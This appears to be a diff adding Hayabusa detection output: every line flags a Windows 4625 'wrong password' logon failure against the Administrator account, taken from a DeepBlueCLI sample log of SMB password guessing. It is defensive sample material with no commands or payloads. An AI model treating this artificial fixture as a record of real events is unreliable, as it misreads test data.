+2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YIZ5Knxg0xr0WmDb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wuej3f7mEoWmd4SX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B0LcCi06ilIhFPwb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jWsCGgoFmH06rRf4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bP47JjNKqtYIZPsC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mNlWZ9o0xf7bl2d0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnPnB2lEN3BSDpXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dVMyeF9jGuzHkTHg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sDKLl3PjW2qrzJGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rkllnePSq3NQ5wgC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9qLWgQnR7P9cs7s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C1AdU07nzvv7RB2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cHgiB5SMiQtsl5oD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 03e7QOn36l0jH35H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DoJBywV8x8cURwrO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SDYGYO6s6g6Dbx8r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nUqXpeTNePFyBmCo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T2h0qJWcbzRe1GSj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: edsfNOovOl1Ow503  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cxCC83XLMIJrNMvl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MzussOcg5ihdrnD0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 55l4HKICu8x0FpQv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5GmlVWDjZ75tT08G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6v1DkuFvB04PESQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VTLdNb0XbzXuLi51  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CSjDYb1BhHC9UTxO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1yLH19VsfLx9BGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X4AVhjdz9yHsfss0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bqWLOKaKwS8VBxDj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EjK8A8DTSYursBzj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UaDCKPslwRaLBWtH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xAvoekviFDSAIgBe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3XOmFwh8IamESWCM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 54GbW769j1x27mrI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bZSkhwZXc1SSknDT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 05AuqlN44x7oJGoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RQ4A6ReTVTcFCFeN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T7U6i4CMrL0bHouf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NaeA4uZ6o8BRbzwf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MEnlL5BHmlCrtk7p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KRNMpwAAaTsyzPfR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oBtHQkRWIoq5hfn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5pkk9lgqMQ4wxQel  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yQVan7kRDOlnim50  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9282GqsC7UiUMbRl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3lj7GjYryW9wjGgS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MPy4iUy5WBSLUBdy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0kvD9DEuos8SRrLH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NH1EnMG6fTvcz4QR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cqHDXSQn8gkl2LJy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RWI9XDDHjs2xcNB7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zo53mEz6nal5Gxff  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jtOgC6wqMoNYVxId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdadoJYvD7DYjlSG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U1xjdqjT9h0KUqG2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QfkzZBvO4onYx6JZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JqY8CvyODDLQV9Ps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nPMRIxRVuh13jmZD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jARkTWdKTfTIwlug  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zwhkc71Nfn7QDf7c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qsYad9PgEajlYqvo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9YPw0DsspVbrOld  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wsHpLCOdAOPFM6nD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcNytOhGOZKaREL9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lc5boBVigHE1ccGA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BQXg4ZHdBYHyiTTO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JebTJzyn91NrpvkD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8wCE5ypjEU5feEEv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OglsROoqX48xm0gJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5bNC9ES3l3KwXPxb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: byPavQuiscMm7CMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UQESAC3XpxCJJfG5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
